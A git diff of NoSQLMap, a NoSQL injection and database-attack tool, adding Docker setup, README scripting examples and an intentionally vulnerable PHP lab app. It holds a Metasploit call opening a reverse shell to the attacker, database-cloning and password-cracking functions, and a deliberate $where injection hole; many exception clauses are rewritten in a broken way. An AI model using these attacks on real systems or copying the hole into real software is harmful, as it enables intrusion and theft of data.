diff --git a/.github/FUNDING.yml b/.github/FUNDING.yml
new file mode 100644
index 0000000..33a48a1
--- /dev/null
+++ b/.github/FUNDING.yml
@@ -0,0 +1,12 @@
+# These are supported funding model platforms
+
+github: # Replace with up to 4 GitHub Sponsors-enabled usernames e.g., [user1, user2]
+patreon: # Replace with a single Patreon username
+open_collective: # Replace with a single Open Collective username
+ko_fi: # Replace with a single Ko-fi username
+tidelift: # Replace with a single Tidelift platform-name/package-name e.g., npm/babel
+community_bridge: # Replace with a single Community Bridge project-name e.g., cloud-foundry
+liberapay: # Replace with a single Liberapay username
+issuehunt: # Replace with a single IssueHunt username
+otechie: # Replace with a single Otechie username
+custom: PayPal.Me/codingo
diff --git a/.github/workflows/stale.yml b/.github/workflows/stale.yml
new file mode 100644
index 0000000..7bbc050
--- /dev/null
+++ b/.github/workflows/stale.yml
@@ -0,0 +1,19 @@
+name: Mark stale issues and pull requests
+
+on:
+ schedule:
+ - cron: "0 0 * * *"
+
+jobs:
+ stale:
+
+ runs-on: ubuntu-latest
+
+ steps:
+ - uses: actions/stale@v1
+ with:
+ repo-token: ${{ secrets.GITHUB_TOKEN }}
+ stale-issue-message: 'Stale issue message'
+ stale-pr-message: 'Stale pull request message'
+ stale-issue-label: 'no-issue-activity'
+ stale-pr-label: 'no-pr-activity'
diff --git a/Dockerfile b/Dockerfile
new file mode 100644
index 0000000..3c46d8d
--- /dev/null
+++ b/Dockerfile
@@ -0,0 +1,17 @@
+FROM python:2.7-alpine
+
+RUN echo 'http://dl-cdn.alpinelinux.org/alpine/v3.9/main' >> /etc/apk/repositories
+RUN echo 'http://dl-cdn.alpinelinux.org/alpine/v3.9/community' >> /etc/apk/repositories
+RUN apk update && apk add mongodb git
+
+WORKDIR /work
+COPY . /work
+
+RUN python setup.py install
+
+RUN python -m pip install 'requests<2.28' 'certifi<=2020.4.5.1'
+
+COPY entrypoint.sh /tmp/entrypoint.sh
+RUN chmod +x /tmp/entrypoint.sh
+
+ENTRYPOINT ["/tmp/entrypoint.sh"]
diff --git a/README.md b/README.md
index 82e79d2..1aa3b47 100644
--- a/README.md
+++ b/README.md
@@ -1,55 +1,73 @@
-NoSQLMap
-========
-[](https://www.python.org/)
+# NoSQLMap
+
+[](https://www.python.org/)
[](https://github.com/codingo/NoSQLMap/blob/master/COPYING)
[](https://twitter.com/codingo_)
NoSQLMap is an open source Python tool designed to audit for as well as automate injection attacks and exploit default configuration weaknesses in NoSQL databases and web applications using NoSQL in order to disclose or clone data from the database.
-Originally authored by [@tcsstool](https://twitter.com/tcstoolHax0r) and now maintained by [@codingo_](https://twitter.com/codingo_) NoSQLMap is named as a tribute to Bernardo Damele and Miroslav's Stampar's popular SQL injection tool [sqlmap](http://sqlmap.org). Its concepts are based on and extensions of Ming Chow's excellent presentation at Defcon 21, ["Abusing NoSQL Databases"](https://www.defcon.org/images/defcon-21/dc-21-presentations/Chow/DEFCON-21-Chow-Abusing-NoSQL-Databases.pdf).
-
+Originally authored by [@tcsstool](https://twitter.com/tcstoolHax0r) and now maintained by [@codingo\_](https://twitter.com/codingo_) NoSQLMap is named as a tribute to Bernardo Damele and Miroslav's Stampar's popular SQL injection tool [sqlmap](http://sqlmap.org). Its concepts are based on and extensions of Ming Chow's excellent presentation at Defcon 21, ["Abusing NoSQL Databases"](https://www.defcon.org/images/defcon-21/dc-21-presentations/Chow/DEFCON-21-Chow-Abusing-NoSQL-Databases.pdf).
## NoSQLMap MongoDB Management Attack Demo.
-
+
## Screenshots
+
# Summary
+
## What is NoSQL?
+
A NoSQL (originally referring to "non SQL", "non relational" or "not only SQL") database provides a mechanism for storage and retrieval of data which is modeled in means other than the tabular relations used in relational databases. Such databases have existed since the late 1960s, but did not obtain the "NoSQL" moniker until a surge of popularity in the early twenty-first century, triggered by the needs of Web 2.0 companies such as Facebook, Google, and Amazon.com. NoSQL databases are increasingly used in big data and real-time web applications. NoSQL systems are also sometimes called "Not only SQL" to emphasize that they may support SQL-like query languages.
## DBMS Support
+
Presently the tool's exploits are focused around MongoDB, and CouchDB but additional support for other NoSQL based platforms such as Redis, and Cassandra are planned in future releases.
-## Requirements
-On a Debian or Red Hat based system, the setup.sh script may be run as root to automate the installation of NoSQLMap's dependencies.
+## Requirements
+
+On a Debian or Red Hat based system, the setup.sh script may be run as root to automate the installation of NoSQLMap's dependencies.
Varies based on features used:
-- Metasploit Framework,
-- Python with PyMongo,
-- httplib2,
-- and urllib available.
-- A local, default MongoDB instance for cloning databases to. Check [here](http://docs.mongodb.org/manual/installation/) for installation instructions.
-There are some various other libraries required that a normal Python installation should have readily available. Your milage may vary, check the script.
+- Metasploit Framework,
+- Python with PyMongo,
+- httplib2,
+- and urllib available.
+- A local, default MongoDB instance for cloning databases to. Check [here](http://docs.mongodb.org/manual/installation/) for installation instructions.
+
+There are some various other libraries required that a normal Python installation should have readily available. Your milage may vary, check the script.
## Setup
+
```
python setup.py install
```
-Alternatively you can build a Docker image by changing to the docker directory and entering:
+
+Alternatively you can build a Docker image by entering:
+
```
docker build -t nosqlmap .
```
+
+or you can use Docker-compose to run Nosqlmap:
+
+```
+docker-compose build
+docker-compose run nosqlmap
+```
+
## Usage Instructions
+
Start with
+
```
python NoSQLMap
```
-NoSQLMap uses a menu based system for building attacks. Upon starting NoSQLMap you are presented with with the main menu:
+NoSQLMap uses a menu based system for building attacks. Upon starting NoSQLMap you are presented with with the main menu:
```
1-Set options (do this first)
@@ -60,11 +78,12 @@ x-Exit
```
Explanation of options:
+
```
1. Set target host/IP-The target web server (i.e. www.google.com) or MongoDB server you want to attack.
2. Set web app port-TCP port for the web application if a web application is the target.
3. Set URI Path-The portion of the URI containing the page name and any parameters but NOT the host name (e.g. /app/acct.php?acctid=102).
-4. Set HTTP Request Method (GET/POST)-Set the request method to a GET or POST; Presently only GET is implemented but working on implementing POST requests exported from Burp.
+4. Set HTTP Request Method (GET/POST)-Set the request method to a GET or POST; Presently only GET is implemented but working on implementing POST requests exported from Burp.
5. Set my local Mongo/Shell IP-Set this option if attacking a MongoDB instance directly to the IP of a target Mongo installation to clone victim databases to or open Meterpreter shells to.
6. Set shell listener port-If opening Meterpreter shells, specify the port.
7. Load options file-Load a previously saved set of settings for 1-6.
@@ -73,4 +92,55 @@ Explanation of options:
x. Back to main menu-Use this once the options are set to start your attacks.
```
-Once options are set head back to the main menu and select DB access attacks or web app attacks as appropriate for whether you are attacking a NoSQL management port or web application. The rest of the tool is "wizard" based and fairly self explanatory, but send emails to codingo@protonmail.com or find me on Twitter [@codingo_](https://twitter.com/codingo_) if you have any questions or suggestions.
+Once options are set head back to the main menu and select DB access attacks or web app attacks as appropriate for whether you are attacking a NoSQL management port or web application. The rest of the tool is "wizard" based and fairly self explanatory, but send emails to codingo@protonmail.com or find me on Twitter [@codingo\_](https://twitter.com/codingo_) if you have any questions or suggestions.
+
+## Vulnerable Applications
+
+This repo also includes an intentionally vulnerable web application to test NoSQLMap with. To run this application, you need Docker installed. Then you can run the following commands from the /vuln_apps directory.
+
+```
+docker-compose build && docker-compose up
+```
+
+Once that is complete, you should be able to access the vulnerable application by visiting: https://127.0.0.1:8080/index.html
+
+## Scripting
+
+The cli can also be scripted. Here's an example script using NoSQLMap to detect the vulnerabilities in vuln_apps:
+
+```
+$ echo "1. Account Lookup (acct.php)"
+$ docker-compose run --remove-orphans nosqlmap \
+ --attack 2 \
+ --victim host.docker.internal \
+ --webPort 8080 \
+ --uri "/acct.php?acctid=test" \
+ --httpMethod GET \
+ --params 1 \
+ --injectSize 4 \
+ --injectFormat 2 \
+ --doTimeAttack n
+
+$ echo "2. User Data Lookup (userdata.php) - JavaScript Injection"
+$ docker-compose run --remove-orphans nosqlmap \
+ --attack 2 \
+ --victim host.docker.internal \
+ --webPort 8080 \
+ --uri "/userdata.php?usersearch=test" \
+ --httpMethod GET \
+ --params 1 \
+ --injectSize 4 \
+ --injectFormat 2 \
+ --doTimeAttack n
+
+$ echo "3. Order Data Lookup (orderdata.php) - JavaScript Injection"
+$ docker-compose run --remove-orphans nosqlmap \
+ --attack 2 \
+ --victim host.docker.internal \
+ --webPort 8080 \
+ --uri "/orderdata.php?ordersearch=test" \
+ --httpMethod GET \
+ --params 1 \
+ --injectSize 4 \
+ --injectFormat 2 \
+ --doTimeAttack n
diff --git a/docker-compose.yml b/docker-compose.yml
new file mode 100644
index 0000000..dc505f6
--- /dev/null
+++ b/docker-compose.yml
@@ -0,0 +1,6 @@
+version: "3"
+services:
+ nosqlmap:
+ image: nosqlmap:latest
+ build:
+ context: .
diff --git a/docker/Dockerfile b/docker/Dockerfile
deleted file mode 100644
index 3882f3d..0000000
--- a/docker/Dockerfile
+++ /dev/null
@@ -1,15 +0,0 @@
-FROM ubuntu:latest
-
-RUN apt-get update && apt-get install -y python python-pip git mongodb
-
-RUN git clone https://github.com/codingo/NoSQLMap.git /root/NoSqlMap
-
-WORKDIR /root/NoSqlMap
-
-RUN python setup.py install
-
-COPY entrypoint.sh /tmp/entrypoint.sh
-
-RUN chmod +x /tmp/entrypoint.sh
-
-ENTRYPOINT ["/tmp/entrypoint.sh"]
diff --git a/docker/entrypoint.sh b/docker/entrypoint.sh
deleted file mode 100644
index f424d72..0000000
--- a/docker/entrypoint.sh
+++ /dev/null
@@ -1,2 +0,0 @@
-#!/bin/bash
-exec python nosqlmap.py
diff --git a/entrypoint.sh b/entrypoint.sh
new file mode 100644
index 0000000..1831ba8
--- /dev/null
+++ b/entrypoint.sh
@@ -0,0 +1,2 @@
+#!/bin/ash
+python nosqlmap.py "$@"
diff --git a/exception.py b/exception.py
new file mode 100644
index 0000000..72659c8
--- /dev/null
+++ b/exception.py
@@ -0,0 +1,6 @@
+#!/usr/bin/python
+# NoSQLMap Copyright 2012-2017 NoSQLMap Development team
+# See the file 'doc/COPYING' for copying permission
+
+class NoSQLMapException(Exception):
+ pass
diff --git a/nosqlmap.py b/nosqlmap.py
index 9ddd8bb..1aac75d 100755
--- a/nosqlmap.py
+++ b/nosqlmap.py
@@ -1,8 +1,9 @@
-# -*- coding: utf-8 -*-
#!/usr/bin/python
+# -*- coding: utf-8 -*-
# NoSQLMap Copyright 2012-2017 NoSQLMap Development team
# See the file 'doc/COPYING' for copying permission
+from exception import NoSQLMapException
import sys
import nsmcouch
import nsmmongo
@@ -279,7 +280,7 @@ def options():
print "Bad octet in IP address."
goodDigits = False
- except:
+ except NoSQLMapException("[!] Must be a DNS name."):
#Must be a DNS name (for now)
notDNS = False
@@ -405,11 +406,11 @@ def options():
elif select == "0":
loadPath = raw_input("Enter file name to load: ")
- cvsOpt = []
+ csvOpt = []
try:
with open(loadPath,"r") as fo:
for line in fo:
- cvsOpt.append(line.rstrip())
+ csvOpt.append(line.rstrip())
except IOError as e:
print "I/O error({0}): {1}".format(e.errno, e.strerror)
raw_input("error reading file. Press enter to continue...")
@@ -503,7 +504,7 @@ def options():
elif select == "h":
reqHeadersIn = raw_input("Enter HTTP Request Header data in a comma separated list (i.e. header name 1,value1,header name 2,value2)\n")
- build_request_headers(reqHeadersIn)
+ requestHeaders = build_request_headers(reqHeadersIn)
elif select == "x":
return
diff --git a/nsmcouch.py b/nsmcouch.py
index f2d344b..33bbe62 100644
--- a/nsmcouch.py
+++ b/nsmcouch.py
@@ -2,6 +2,7 @@
# NoSQLMap Copyright 2012-2017 NoSQLMap Development team
# See the file 'doc/COPYING' for copying permission
+from exception import NoSQLMapException
import couchdb
import urllib
import requests
@@ -39,10 +40,10 @@ def couchScan(target,port,pingIt):
except couchdb.http.Unauthorized:
return [1,None]
- except:
+ except NoSQLMapException:
return [2,None]
- except:
+ except NoSQLMapException:
return [3,None]
else:
@@ -59,10 +60,10 @@ def couchScan(target,port,pingIt):
except couchdb.http.Unauthorized:
return [1,None]
- except:
+ except NoSQLMapException:
return [2,None]
- except:
+ except NoSQLMapException:
return [3,None]
def netAttacks(target,port, myIP, args = None):
@@ -92,7 +93,7 @@ def netAttacks(target,port, myIP, args = None):
print "CouchDB authenticated on " + target + ":" + str(port)
mgtOpen = True
- except:
+ except NoSQLMapException:
raw_input("Failed to authenticate. Press enter to continue...")
return
@@ -113,7 +114,7 @@ def netAttacks(target,port, myIP, args = None):
if mgtRespCode == 200:
print "Sofa web management open at " + mgtUrl + ". No authentication required!"
- except:
+ except NoSQLMapException:
print "Sofa web management closed or requires authentication."
if mgtOpen == True:
@@ -152,7 +153,7 @@ def getPlatInfo(couchConn, target):
return
-def enumAtt(conn,target):
+def enumAtt(conn, target, port):
dbList = []
print "Enumerating all attachments..."
@@ -179,7 +180,7 @@ def enumDbs (couchConn,target,port):
print "\n".join(dbList)
print "\n"
- except:
+ except NoSQLMapException:
print "Error: Couldn't list databases. The provided credentials may not have rights."
if '_users' in dbList:
@@ -253,7 +254,7 @@ def stealDBs (myDB,couchConn,target,port):
else:
return
- except:
+ except NoSQLMapException:
raw_input ("Something went wrong. Are you sure your CouchDB is running and options are set? Press enter to return...")
return
@@ -343,7 +344,7 @@ def dict_pass(key,salt,dbVer):
passList = f.readlines()
loadCheck = True
- except:
+ except NoSQLMapException:
print " Couldn't load file."
print "Running dictionary attack..."
diff --git a/nsmmongo.py b/nsmmongo.py
index ee61e02..996668a 100644
--- a/nsmmongo.py
+++ b/nsmmongo.py
@@ -2,6 +2,7 @@
# NoSQLMap Copyright 2012-2017 NoSQLMap Development team
# See the file 'doc/COPYING' for copying permission
+from exception import NoSQLMapException
import pymongo
import urllib
import json
@@ -49,7 +50,7 @@ def netAttacks(target, dbPort, myIP, myPort, args = None):
conn = pymongo.MongoClient(target)
print "MongoDB authenticated on " + target + ":27017!"
mgtOpen = True
- except:
+ except NoSQLMapException:
raw_input("Failed to authenticate. Press enter to continue...")
return
@@ -91,7 +92,7 @@ def netAttacks(target, dbPort, myIP, myPort, args = None):
print "REST interface not enabled."
print "\n"
- except Exception, e:
+ except NoSQLMapException:
print "MongoDB web management closed or requires authentication."
if mgtOpen == True:
@@ -180,7 +181,7 @@ def stealDBs(myDB,victim,mongoConn):
else:
return
- except Exception, e:
+ except NoSQLMapException, e:
if str(e).find('text search not enabled') != -1:
raw_input("Database copied, but text indexing was not enabled on the target. Indexes not moved. Press enter to return...")
return
@@ -231,7 +232,7 @@ def dict_pass(user,key):
with open (dictionary) as f:
passList = f.readlines()
loadCheck = True
- except:
+ except NoSQLMapException:
print " Couldn't load file."
print "Running dictionary attack..."
@@ -303,7 +304,7 @@ def enumDbs (mongoConn):
print "\n".join(mongoConn.database_names())
print "\n"
- except:
+ except NoSQLMapException:
print "Error: Couldn't list databases. The provided credentials may not have rights."
print "List of collections:"
@@ -328,7 +329,7 @@ def enumDbs (mongoConn):
if crack in yes_tag:
passCrack(users[x]['user'],users[x]['pwd'])
- except Exception, e:
+ except NoSQLMapException, e:
print e
print "Error: Couldn't list collections. The provided credentials may not have rights."
@@ -336,11 +337,11 @@ def enumDbs (mongoConn):
return
-def msfLaunch():
+def msfLaunch(victim, myIP, myPort):
try:
proc = subprocess.call(["msfcli", "exploit/linux/misc/mongod_native_helper", "RHOST=%s" % victim, "DB=local", "PAYLOAD=linux/x86/shell/reverse_tcp", "LHOST=%s" % myIP, "LPORT=%s" % myPort, "E"])
- except:
+ except NoSQLMapException:
print "Something went wrong. Make sure Metasploit is installed and path is set, and all options are defined."
raw_input("Press enter to continue...")
return
@@ -357,10 +358,10 @@ def enumGrid (mongoConn):
print " list of files:"
print "\n".join(files)
- except:
+ except NoSQLMapException:
print "GridFS not enabled on " + str(dbItem) + "."
- except:
+ except NoSQLMapException:
print "Error: Couldn't enumerate GridFS. The provided credentials may not have rights."
return
@@ -381,7 +382,7 @@ def mongoScan(ip,port,pingIt):
conn.close()
return [0,dbVer]
- except:
+ except NoSQLMapException:
if str(sys.exc_info()).find('need to login') != -1:
conn.close()
return [1,None]
@@ -390,7 +391,7 @@ def mongoScan(ip,port,pingIt):
conn.close()
return [2,None]
- except:
+ except NoSQLMapException:
return [3,None]
else:
@@ -405,7 +406,7 @@ def mongoScan(ip,port,pingIt):
conn.close()
return [0,dbVer]
- except Exception, e:
+ except NoSQLMapException, e:
if str(e).find('need to login') != -1:
conn.close()
return [1,None]
@@ -414,5 +415,5 @@ def mongoScan(ip,port,pingIt):
conn.close()
return [2,None]
- except:
+ except NoSQLMapException:
return [3,None]
diff --git a/nsmscan.py b/nsmscan.py
index 06cb044..b292aad 100644
--- a/nsmscan.py
+++ b/nsmscan.py
@@ -3,6 +3,7 @@
# See the file 'doc/COPYING' for copying permission
+from exception import NoSQLMapException
import ipcalc
import nsmmongo
import nsmcouch
@@ -41,7 +42,7 @@ def massScan(platform, args = None):
for ip in ipcalc.Network(subnet):
ipList.append(str(ip))
optCheck = False
- except:
+ except NoSQLMapException:
raw_input("Not a valid subnet. Press enter to return to main menu.")
return
@@ -54,7 +55,7 @@ def massScan(platform, args = None):
ipList = f.readlines()
loadCheck = True
optCheck = False
- except:
+ except NoSQLMapException:
print "Couldn't open file."
if loadOpt == "3":
@@ -119,7 +120,7 @@ def massScan(platform, args = None):
print "Scan results saved!"
select = False
- except:
+ except NoSQLMapException:
print "Couldn't save scan results."
elif saveEm in no_tag:
diff --git a/nsmweb.py b/nsmweb.py
index e2fcc77..0b5a8f9 100644
--- a/nsmweb.py
+++ b/nsmweb.py
@@ -3,6 +3,7 @@
# See the file 'doc/COPYING' for copying permission
+from exception import NoSQLMapException
import urllib
import urllib2
import string
@@ -106,7 +107,7 @@ def getApps(webPort,victim,uri,https,verb,requestHeaders, args = None):
else:
print "Got " + str(appRespCode) + "from the app, check your options."
- except Exception,e:
+ except NoSQLMapException,e:
print e
print "Looks like the server didn't respond. Check your options."
@@ -445,7 +446,7 @@ def postApps(victim,webPort,uri,https,verb,postData,requestHeaders, args = None)
else:
print "Got " + str(appRespCode) + "from the app, check your options."
- except Exception,e:
+ except NoSQLMapException,e:
print e
print "Looks like the server didn't respond. Check your options."
@@ -464,7 +465,7 @@ def postApps(victim,webPort,uri,https,verb,postData,requestHeaders, args = None)
injIndex = int(args.injectedParameter)
injOpt = str(postData.keys()[int(injIndex)-1])
print "Injecting the " + injOpt + " parameter..."
- except:
+ except NoSQLMapException:
if args == None:
raw_input("Something went wrong. Press enter to return to the main menu...")
return
@@ -909,7 +910,7 @@ def buildUri(origUri, randValue, args=None):
split_uri = origUri.split("?")
params = split_uri[1].split("&")
- except:
+ except NoSQLMapException:
raw_input("Not able to parse the URL and parameters. Check options settings. Press enter to return to main menu...")
return
@@ -938,7 +939,7 @@ def buildUri(origUri, randValue, args=None):
for params in injOpt:
print "Injecting the " + params + " parameter..."
- except Exception:
+ except NoSQLMapException:
raw_input("Something went wrong. Press enter to return to the main menu...")
return
diff --git a/setup.py b/setup.py
index 27de04e..1372457 100644
--- a/setup.py
+++ b/setup.py
@@ -6,7 +6,7 @@
name = "NoSQLMap",
version = "0.7",
packages = find_packages(),
- scripts = ['nosqlmap.py', 'nsmmongo.py', 'nsmcouch.py','nsmscan.py','nsmweb.py'],
+ scripts = ['nosqlmap.py', 'nsmmongo.py', 'nsmcouch.py', 'nsmscan.py', 'nsmweb.py', 'exception.py'],
entry_points = {
"console_scripts": [
@@ -14,9 +14,9 @@
]
},
- install_requires = [ "CouchDB==1.0", "httplib2==0.9", "ipcalc==1.1.3",\
+ install_requires = [ "CouchDB==1.0", "httplib2==0.19.0", "ipcalc==1.1.3",\
"NoSQLMap==0.7", "pbkdf2==1.3", "pymongo==2.7.2",\
- "requests==2.5.0"],
+ "requests<2.28"],
author = "tcstool",
author_email = "codingo@protonmail.com",
diff --git a/vuln_apps/acct.php b/vuln_apps/acct.php
deleted file mode 100644
index c03feef..0000000
--- a/vuln_apps/acct.php
+++ /dev/null
@@ -1,39 +0,0 @@
-
-
-Payment information
-
-
-customers;
- $collection = $db->paymentinfo;
- $search = $_GET['acctid'];
-// $criteria = array('id' => $search);
-// $fields = array('name','id','cc','cvv2');
-
-
- $cursor = $collection->find(array('id' => $search));
-
-// echo $search;
- echo $cursor->count() . ' document(s) found.
';
-
- foreach ($cursor as $obj) {
- echo 'Name: ' . $obj['name'] . '
';
- echo 'Customer ID: ' . $obj['id'] . '
';
- echo 'Card Number: ' . $obj['cc'] . '
';
- echo 'CVV2 Code: ' . $obj['cvv2'] . '
';
- echo '
';
- }
-
-$conn->close();
-} catch (MongoConnectionException $e) {
- die('Error connecting to MongoDB server : ' . $e->getMessage());
-} catch (MongoException $e) {
- die('Error: ' . $e->getMessage());
-}
-?>
-
-
-
-
\ No newline at end of file
diff --git a/vuln_apps/cust.html b/vuln_apps/cust.html
deleted file mode 100644
index ed80d22..0000000
--- a/vuln_apps/cust.html
+++ /dev/null
@@ -1,21 +0,0 @@
-
-
-Customer Info
-
-
-
-Customer Information
-Enter your customer ID to show your account information:
-
-
-
-
-
\ No newline at end of file
diff --git a/vuln_apps/docker-compose.yml b/vuln_apps/docker-compose.yml
new file mode 100644
index 0000000..3572ad4
--- /dev/null
+++ b/vuln_apps/docker-compose.yml
@@ -0,0 +1,27 @@
+version: "3.8"
+services:
+ apache:
+ container_name: apache
+ build: ./docker/apache
+ links:
+ - php
+ ports:
+ - "${NOSQLMAP_VULN_APPS_APACHE_PORT:-8080}:80"
+ volumes:
+ - ./src:/usr/local/apache2/htdocs
+ php:
+ container_name: php
+ build: ./docker/php
+ ports:
+ - "${NOSQLMAP_VULN_APPS_PHP_PORT:-9000}:9000"
+ volumes:
+ - ./src:/usr/local/apache2/htdocs
+ working_dir: /usr/local/apache2/htdocs
+ mongo:
+ container_name: mongo
+ environment:
+ MONGO_INITDB_ROOT_USERNAME: root
+ MONGO_INITDB_ROOT_PASSWORD: prisma
+ build: ./docker/mongo
+ ports:
+ - "${NOSQLMAP_VULN_APPS_MONGO_PORT:-27017}:27017"
diff --git a/vuln_apps/docker/apache/Dockerfile b/vuln_apps/docker/apache/Dockerfile
new file mode 100644
index 0000000..9562989
--- /dev/null
+++ b/vuln_apps/docker/apache/Dockerfile
@@ -0,0 +1,6 @@
+FROM httpd:2.4.51
+
+COPY apache.conf /usr/local/apache2/conf/apache.conf
+
+RUN echo "Include /usr/local/apache2/conf/apache.conf" \
+ >> /usr/local/apache2/conf/httpd.conf
\ No newline at end of file
diff --git a/vuln_apps/docker/apache/apache.conf b/vuln_apps/docker/apache/apache.conf
new file mode 100644
index 0000000..76f67dd
--- /dev/null
+++ b/vuln_apps/docker/apache/apache.conf
@@ -0,0 +1,16 @@
+LoadModule deflate_module /usr/local/apache2/modules/mod_deflate.so
+LoadModule proxy_module /usr/local/apache2/modules/mod_proxy.so
+LoadModule proxy_fcgi_module /usr/local/apache2/modules/mod_proxy_fcgi.so
+
+
+ ProxyPassMatch ^/(.*\.php(/.*)?)$ fcgi://php:9000/usr/local/apache2/htdocs/$1
+
+ DocumentRoot /usr/local/apache2/htdocs
+
+
+ Options -Indexes +FollowSymLinks
+ DirectoryIndex index.php
+ AllowOverride All
+ Require all granted
+
+
\ No newline at end of file
diff --git a/vuln_apps/docker/mongo/Dockerfile b/vuln_apps/docker/mongo/Dockerfile
new file mode 100644
index 0000000..6920c0c
--- /dev/null
+++ b/vuln_apps/docker/mongo/Dockerfile
@@ -0,0 +1,5 @@
+FROM mongo:latest
+
+ADD ./mongo.nosql /tmp/mongo.nosql
+ADD ./import.sh /tmp/import.sh
+RUN chmod +x /tmp/import.sh
diff --git a/vuln_apps/docker/mongo/import.sh b/vuln_apps/docker/mongo/import.sh
new file mode 100644
index 0000000..a845618
--- /dev/null
+++ b/vuln_apps/docker/mongo/import.sh
@@ -0,0 +1,2 @@
+#!/bin/bash
+cat /tmp/mongo.nosql | mongosh "mongodb://root:prisma@mongo:27017"
\ No newline at end of file
diff --git a/vuln_apps/mongo.nosql b/vuln_apps/docker/mongo/mongo.nosql
similarity index 99%
rename from vuln_apps/mongo.nosql
rename to vuln_apps/docker/mongo/mongo.nosql
index 45bfcbc..577f0ed 100644
--- a/vuln_apps/mongo.nosql
+++ b/vuln_apps/docker/mongo/mongo.nosql
@@ -5,7 +5,6 @@ db.orders.insert({"id":"1","name":"Robin","item":"Music gift cards","quantity":"
db.orders.insert({"id":"1001","name":"Moses","item":"Miami Heat tickets","quantity":"1000"})
db.orders.insert({"id":"66","name":"Rick","item":"Black hoodie","quantity":"1"})
db.orders.insert({"id":"0","name":"Nobody","item":"Nothing","quantity":"0"})
-
use customers
db.paymentinfo.insert({"name":"Adrien","id":"42","cc":"5555123456789999","cvv2":"1234"})
db.paymentinfo.insert({"name":"Justin","id":"99","cc":"5555123456780000","cvv2":"4321"})
@@ -13,7 +12,6 @@ db.paymentinfo.insert({"name":"Robin","id":"1","cc":"3333444455556666","cvv2":"2
db.paymentinfo.insert({"name":"Moses","id":"2","cc":"4444555566667777","cvv2":"3333"})
db.paymentinfo.insert({"name":"Rick","id":"3","cc":"5555666677778888","cvv2":"5678"})
db.paymentinfo.insert({"name":"Nobody","id":"0","cc":"45009876543215555","cvv2":"9999"})
-
use appUserData
db.users.insert({"name":"Adrien","username":"adrien","email":"adrien@sec642.org"})
db.users.insert({"name":"Justin","username":"justin","email":"justin@sec642.org"})
diff --git a/vuln_apps/docker/php/Dockerfile b/vuln_apps/docker/php/Dockerfile
new file mode 100644
index 0000000..a266475
--- /dev/null
+++ b/vuln_apps/docker/php/Dockerfile
@@ -0,0 +1,13 @@
+FROM php:8.1-fpm
+
+RUN mv "$PHP_INI_DIR/php.ini-development" "$PHP_INI_DIR/php.ini"
+RUN echo "extension=mongodb.so" >> "$PHP_INI_DIR/php.ini"
+
+RUN apt-get update \
+ && apt-get install -y libcurl4-openssl-dev pkg-config libssl-dev \
+ && apt-get install -y git zip unzip \
+ && pecl install mongodb \
+ && php -r "copy('https://getcomposer.org/installer', 'composer-setup.php');" \
+ && php composer-setup.php --install-dir=/usr/local/bin --filename=composer \
+ && rm composer-setup.php \
+ && composer require mongodb/mongodb
\ No newline at end of file
diff --git a/vuln_apps/orderdata.php b/vuln_apps/orderdata.php
deleted file mode 100644
index 427359f..0000000
--- a/vuln_apps/orderdata.php
+++ /dev/null
@@ -1,51 +0,0 @@
-
-
-
-
-
-Order Lookup
-
-
-
-shop;
- $collection = $db->orders;
- $search = $_GET['ordersearch'];
- $js = "function () { var query = '". $search . "'; return this.id == query;}";
- //print $js;
- print '
';
-
- $cursor = $collection->find(array('$where' => $js));
- echo $cursor->count() . ' order(s) found.
';
-
- foreach ($cursor as $obj) {
- echo 'Order ID: ' . $obj['id'] . '
';
- echo 'Name: ' . $obj['name'] . '
';
- echo 'Item: ' . $obj['item'] . '
';
- echo 'Quantity: ' . $obj['quantity']. '
';
- echo '
';
- }
-
-$conn->close();
-} catch (MongoConnectionException $e) {
- die('Error connecting to MongoDB server : ' . $e->getMessage());
-} catch (MongoException $e) {
- die('Error: ' . $e->getMessage());
-}
-}
-?>
-
-
-Use the Order ID to locate your order:
-
-
-
-
-
-
diff --git a/vuln_apps/src/acct.php b/vuln_apps/src/acct.php
new file mode 100644
index 0000000..21725a7
--- /dev/null
+++ b/vuln_apps/src/acct.php
@@ -0,0 +1,42 @@
+
+
+
+ Payment information
+
+
+
+ [],
+ ];
+ $filter = ['id' => $_GET['acctid']];
+ $query = new MongoDB\Driver\Query($filter, $options);
+
+ $cursor = $conn->executeQuery('customers.paymentinfo', $query);
+ $counter = 0;
+
+ foreach ($cursor as $obj) {
+ $counter++;
+ echo 'Name: ' . $obj->name . '
';
+ echo 'Customer ID: ' . $obj->id . '
';
+ echo 'Card Number: ' . $obj->cc . '
';
+ echo 'CVV2 Code: ' . $obj->cvv2 . '
';
+ echo '
';
+ }
+
+ echo $counter . ' document(s) found.
';
+
+ } catch (MongoConnectionException $e) {
+ die('Error connecting to MongoDB server : ' . $e->getMessage());
+ } catch (MongoException $e) {
+ die('Error: ' . $e->getMessage());
+ }
+ ?>
+
+
+
+
+
\ No newline at end of file
diff --git a/vuln_apps/src/index.html b/vuln_apps/src/index.html
new file mode 100644
index 0000000..62996f1
--- /dev/null
+++ b/vuln_apps/src/index.html
@@ -0,0 +1,17 @@
+
+
+ Customer Info
+
+
+
+ Customer Information
+ Enter your customer ID to show your account information:
+
+
+
+
diff --git a/vuln_apps/src/orderdata.php b/vuln_apps/src/orderdata.php
new file mode 100644
index 0000000..0430cc2
--- /dev/null
+++ b/vuln_apps/src/orderdata.php
@@ -0,0 +1,49 @@
+
+
+
+ Order Lookup
+
+
+ shop;
+ $collection = $db->orders;
+ $search = $_GET['ordersearch'];
+ $js = "function () { var query = '". $search . "'; return this.id == query;}";
+ //print $js;
+ print '
';
+
+ $cursor = $collection->find(array('$where' => $js));
+ echo $cursor->count() . ' order(s) found.
';
+
+ foreach ($cursor as $obj) {
+ echo 'Order ID: ' . $obj['id'] . '
';
+ echo 'Name: ' . $obj['name'] . '
';
+ echo 'Item: ' . $obj['item'] . '
';
+ echo 'Quantity: ' . $obj['quantity']. '
';
+ echo '
';
+ }
+ $conn->close();
+ } catch (MongoConnectionException $e) {
+ die('Error connecting to MongoDB server : ' . $e->getMessage());
+ } catch (MongoException $e) {
+ die('Error: ' . $e->getMessage());
+ }
+ }
+ ?>
+
+
+ Use the Order ID to locate your order:
+
+
+
+
+
+
+
\ No newline at end of file
diff --git a/vuln_apps/populate_db.php b/vuln_apps/src/populate_db.php
similarity index 99%
rename from vuln_apps/populate_db.php
rename to vuln_apps/src/populate_db.php
index 44d2576..c058543 100644
--- a/vuln_apps/populate_db.php
+++ b/vuln_apps/src/populate_db.php
@@ -104,4 +104,4 @@
echo $obj["email"] . "
";
}
-?>
+?>
\ No newline at end of file
diff --git a/vuln_apps/src/userdata.php b/vuln_apps/src/userdata.php
new file mode 100644
index 0000000..11d1216
--- /dev/null
